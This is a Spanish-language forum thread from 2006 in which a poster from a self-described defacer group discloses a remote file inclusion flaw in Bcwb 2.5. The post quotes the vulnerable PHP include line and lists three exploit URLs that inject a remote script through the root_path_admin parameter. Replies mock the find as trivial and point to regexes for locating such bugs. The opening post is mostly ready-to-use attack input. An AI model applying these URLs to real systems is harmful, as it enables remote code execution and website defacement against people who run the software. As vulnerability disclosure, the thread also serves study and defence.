elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
11 Octubre 2008, 00:05  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: sirdarckcat, berz3k)
| | |-+  Bcwb 2.5 - Multiple RFI By Firewall		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Bcwb 2.5 - Multiple RFI By Firewall  (Leído 440 veces)
|Azrack|

Desconectado Desconectado

Mensajes: 85


Enjoy The Silence


Ver Perfil
Bcwb 2.5 - Multiple RFI By Firewall
« en: 01 Noviembre 2006, 00:53 »
####################### Firewall #########################
                                 Bcwb 2.5 - Multiple File Include by Firewall
                                           Latin   American   Defacers
                                              Bug Found by Firewall

# Application Affect:
                    Bcwb 2.5

# Sorce Code:             
         http://prdownloads.sourceforge.net/bcwb/bcwb_v25.zip?download

# Code:
       if(! include($root_path_admin.'lang/'.$default_language.'.inc.php') ) die("Can't include ".$root_path.'lang/'.$default_language.'.inc.php');

# ExPloit :
   http://www.site.com/Bcwb_PATH/include/startup.inc.php?root_path_admin=[Evil Script]

http://www.site.com/Bcwb_PATH/dcontent/default.css.php?root_path_admin=[Evil Script]

http://www.site.com/Bcwb_PATH/system/default.css.php?root_path_admin=[Evil Script]       

# GrEatZ :
Her0,slackwaren,slappter,Cvir.System,Mnox,NitroNet,Matasanos,Hanowars,
ANtrAX,napster,saok,Zlevyn,FaLENcE,Azrael,CyberAlexis,krhonoz.

####################### Firewall #########################

http://www.securityfocus.com/archive/1/450069/30/0/threaded
En línea
Hay gente tan Ignorante que cree en dios.

Status MSN:>><<
Ertai
Moderador Global
*****
Desconectado Desconectado

Mensajes: 2.012


Ralph Wiggum


Ver Perfil
Re: Bcwb 2.5 - Multiple RFI By Firewall
« Respuesta #1 en: 01 Noviembre 2006, 22:32 »
Por dios, eso lo descubre cualquiera con una simple expresión regular en Google Labs...
En línea
Si la felicidad se comprara, entonces el dinero sería noble.

Código:
void rotar_by_ref(int& a, int& b) {
   /* Quien dijo que no se podia sin una variable temporal? */
   *a = *a ^ *b;
   *b = *a ^ *b;
   *a = *a ^ *b;
}
|Azrack|

Desconectado Desconectado

Mensajes: 85


Enjoy The Silence


Ver Perfil
Re: Bcwb 2.5 - Multiple RFI By Firewall
« Respuesta #2 en: 26 Noviembre 2006, 14:29 »
bueno tio quisas tu seas un profesional q' aya estudiado pero yo soy un simple aficionado
En línea
Hay gente tan Ignorante que cree en dios.

Status MSN:>><<
sirdarckcat
sdc
Moderador
*****
Desconectado Desconectado

Mensajes: 4.653


HAND


Ver Perfil WWW
Re: Bcwb 2.5 - Multiple RFI By Firewall
« Respuesta #3 en: 26 Noviembre 2006, 22:13 »
hace tiempo incluso puse las expresiones regulares necesarias para encontrar estos bugs..

http://foro.elhacker.net/index.php/topic,143215.msg674527.html#msg674527

en milw0rm tambien las publique, y algunos usuarios agregaron otras expresiones.. basandose en las primeras: http://forum.milw0rm.com/showthread.php?t=2939

:P acaba de salir una nueva expresion, al que busca bugs solo porque si..
 bug kiddie

xDD

Saludos!!
En línea
Mis páginas web:
- mi web, my blog, my web
http://ejemplode.com/, http://sybsecurity.com/
Páginas: [1] Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC
Free counter and web stats